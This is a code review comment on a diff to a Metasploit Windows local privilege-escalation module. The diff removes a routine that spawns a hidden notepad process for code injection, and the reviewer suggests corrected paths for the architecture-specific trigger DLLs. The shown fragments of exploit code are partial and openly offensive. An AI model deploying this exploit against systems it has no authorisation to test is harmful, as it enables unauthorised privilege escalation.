modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -73,42 +79,16 @@ def initialize(info = {})
     ])
   end
 
-  def setup_process
-    begin
-      print_status('Launching notepad to host the exploit...')
-      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
-      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
-      print_good("Process #{process.pid} launched.")
-    rescue Rex::Post::Meterpreter::RequestError
-      # Sandboxes could not allow to create a new process
-      # stdapi_sys_process_execute: Operation failed: Access is denied.
-      print_error('Operation failed. Trying to elevate the current process...')
-      process = client.sys.process.open
-    end
-    process
-  end
-
-  def inject_magic(process)
+  def launch_dll_trigger
     if sysinfo['Architecture'] == ARCH_X64
       library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll')
     elsif sysinfo['Architecture'] == ARCH_X86
       library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x86.dll')
```

Comment:
Correct me if I am wrong but shouldn't these be updated? The path no longer exists, I imagine its now meant to directly under the `data_directory` vs under the additional `exploits` directory.

```suggestion
      library_path = ::File.join(Msf::Config.data_directory, 'uso_trigger', 'uso_trigger.x64.dll')
    elsif sysinfo['Architecture'] == ARCH_X86
      library_path = ::File.join(Msf::Config.data_directory, 'uso_trigger', 'uso_trigger.x86.dll')
```